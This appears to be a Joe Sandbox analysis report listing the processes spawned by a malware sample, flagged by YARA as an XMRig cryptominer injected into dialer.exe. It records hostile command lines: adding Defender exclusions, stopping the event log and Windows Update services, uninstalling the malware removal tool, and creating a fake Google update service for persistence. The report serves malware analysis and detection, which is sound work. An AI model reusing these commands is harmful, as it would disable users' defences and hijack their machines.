                                                            Target ID:16
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:04:37:03
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:04:37:04
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff70f330000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\winlogon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:winlogon.exe
                                                            Imagebase:0x7ff7cd660000
                                                            File size:906'240 bytes
                                                            MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:31
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:33
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:34
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:35
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\ProgramData\Google\Chrome\updater.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                            Imagebase:0x7ff671c90000
                                                            File size:5'511'168 bytes
                                                            MD5 hash:FB788C569D7B0ACF5546340AA85CD0A6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 50%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:36
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\lsass.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\lsass.exe
                                                            Imagebase:0x7ff7a2ae0000
                                                            File size:59'456 bytes
                                                            MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:37
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:38
                                                            Start time:04:37:05
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:39
                                                            Start time:04:37:06
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:40
                                                            Start time:04:37:06
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dwm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"dwm.exe"
                                                            Imagebase:0x7ff74e710000
                                                            File size:94'720 bytes
                                                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:41
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff767cb0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:42
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:44
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:45
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\wusa.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff62b220000
                                                            File size:345'088 bytes
                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:46
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:47
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:48
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:49
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:50
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:51
                                                            Start time:04:37:07
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:52
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                            Imagebase:0x7ff798d70000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:53
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:54
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:55
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:56
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:57
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:58
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:59
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:60
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:61
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:62
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:63
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:64
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000040.00000002.3074015557.000001AC03840000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000040.00000002.3074015557.000001AC037E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            General

                                                            Target ID:65
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:66
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:67
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:68
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:69
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FF6CC421140 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1734386086.00007FF6CC421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CC420000, based on PE: true
                                                              • Associated: 00000000.00000002.1734356130.00007FF6CC420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1734436298.00007FF6CC434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1734501457.00007FF6CC438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1734556728.00007FF6CC439000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1735049508.00007FF6CC92D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1735096183.00007FF6CC966000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1735114856.00007FF6CC969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6cc420000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
